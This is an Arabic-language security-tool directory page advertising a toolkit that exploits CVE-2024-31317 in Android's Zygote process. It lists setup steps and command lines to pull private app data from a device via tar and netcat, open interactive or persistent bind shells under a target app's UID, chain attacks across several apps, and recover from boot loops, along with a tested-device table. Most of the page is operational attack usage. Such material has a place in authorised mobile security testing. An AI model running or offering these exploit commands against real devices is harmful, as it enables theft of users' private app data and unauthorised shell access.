Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
zygote-CVE-2024-31317 — هذه مجموعة أدوات تستخدم CVE-2024-31317 لاستخراج بيانات التطبيق الخاصة عبر ADB أو فتح شل بمعرّف UID الخاص بالتطبيق. | Kitploit
أدوات/GitHubGitHub/vnescape/zygote-cve-2024-31317
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالتسريب البياناتاختبار الاختراقأمن الجوال
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

هذه مجموعة أدوات تستخدم CVE-2024-31317 لاستخراج بيانات التطبيق الخاصة عبر ADB أو فتح شل بمعرّف UID الخاص بالتطبيق.

عرض المستودع
312منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Zygote Toolkit - CVE-2024-31317

هذه مجموعة أدوات تستخدم CVE-2024-31317 لاستخراج البيانات الخاصة للتطبيقات عبر ADB أو لفتح شل بمعرف المستخدم (UID) الخاص بتطبيق. تؤثر هذه الثغرة على إصدارات أندرويد من 9 إلى 14 التي تعمل بمستوى تصحيح أمني 2024-06-01 أو أقل. يمكن العثور على مصفوفة دعم للأجهزة المختبرة أدناه.

المتطلبات الأساسية

Debian/Ubuntu (حزم النظام)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

أضف سطري export إلى ~/.bashrc (أو ما يعادله) للاستمرارية.

التحقق

root@kitploit:~
./setup.sh

بدء سريع

root@kitploit:~
# Build and install the carrier APK (auto-builds from source)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# Extract an app's data directory
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app

يبني الاستغلال كل شيء من Hijack.java و AndroidManifest.xml عند أول تشغيل.

الاستخدام

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

الأوضاع

الخيارات

أمثلة

root@kitploit:~
# Extraction
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube

# Check if device is vulnerable
python3 cve_2024_31317.py -d DEVICE --check-vuln

# Interactive bind shell
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube

# Persistent shell on port 7777
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube

# Multi-app chain
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"

# Recovery only (fix boot loop)
python3 cve_2024_31317.py -d DEVICE --recover

البناء من المصدر

يُبنى كل شيء من المصدر وقت التشغيل. تستخدم خطوة البناء javac (JDK 17+) وd8 وaapt وzipalign وapksigner من Android SDK.

  • x86_64 → arm64: تعمل الأدوات بشكل أصلي؛ ناتج DEX مستقل عن البنية
  • ARM64 → arm64: يعمل كل شيء بشكل أصلي (توفر Adoptium إصدارات JDK لمعمارية ARM64)

رمز المرور

إذا كان الجهاز يحتوي على رمز مرور، فإنه يبدأ في حالة BFU (قبل أول فتح). يستقصي الاستغلال sys.user.0.ce_available لمدة تصل إلى 5 دقائق حتى تقوم بفتح الجهاز. يُنصح بإزالة رمز المرور طوال مدة الاستغلال.

الأجهزة المختبرة

† خاص بجهاز Samsung One UI: حقن ZNJECT ينجح ويعمل استخراج -E، لكن شل bind المرتبط بـ toybox nc ServerSocket لا يُفتح أبدًا. يتطلب مزيدًا من البحث لمعرفة السبب الجذري للمشكلة.

الاسترداد

يمكن أن تسبب الحمولة المتبقية في hidden_api_blacklist_exemptions حلقة إقلاع (boot loop) عند الإقلاع التالي. شغّل --recover لإعادة التعيين:

root@kitploit:~
python3 cve_2024_31317.py -d DEVICE --recover
تنزيل الأداة
Flagالوصف
-Eاستخراج بيانات التطبيق عبر tar | nc الفرعي (يبقى بعد قتل العملية الأب)
-iشل تفاعلي مرتبط (bind shell) REPL
-S PORTشل دائم (بروتوكول FIFO أحادي المنفذ)
--recoverإعادة تعيين الإعداد، إصلاح تعليق الإقلاع / تدهور Zygote
--setupبناء وتثبيت APK الحامل فقط (بدون حقن)
--list-appsسرد جميع الحزم المثبتة مع UID ونوع sys/user
--check-vulnالتحقق مما إذا كان الجهاز عرضة لـ CVE-2024-31317 ثم الخروج
Flagالوصف
-o file.tarمسار الإخراج لأرشيف الاستخراج (tarball)
-y / --yesتخطي مطالبات التأكيد
--retries Nالحد الأقصى لعدد المحاولات لكل هدف (الافتراضي 3)
--chain-targets "pkg1,pkg2"استخراج تطبيقات متعددة في جلسة واحدة
--chain-file file.jsonنفس ما سبق، من ملف JSON
--reboot-afterإعادة التشغيل بعد الاستخراج (يستعيد Zygote)
--reboot-every Nإعادة التشغيل بعد كل N من أهداف السلسلة
--coldتخطي الإحماء؛ تخزين الحمولة لبدء التشغيل التالي للتطبيق
--port PORTمنفذ الشل المرتبط (الافتراضي 8888)
-d SERIALاستهداف جهاز محدد (عند اتصال عدة أجهزة)
--rebuildفرض إعادة بناء APK الحامل
DeviceAndroidAPIPatchABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vulnScore
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (emulator)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12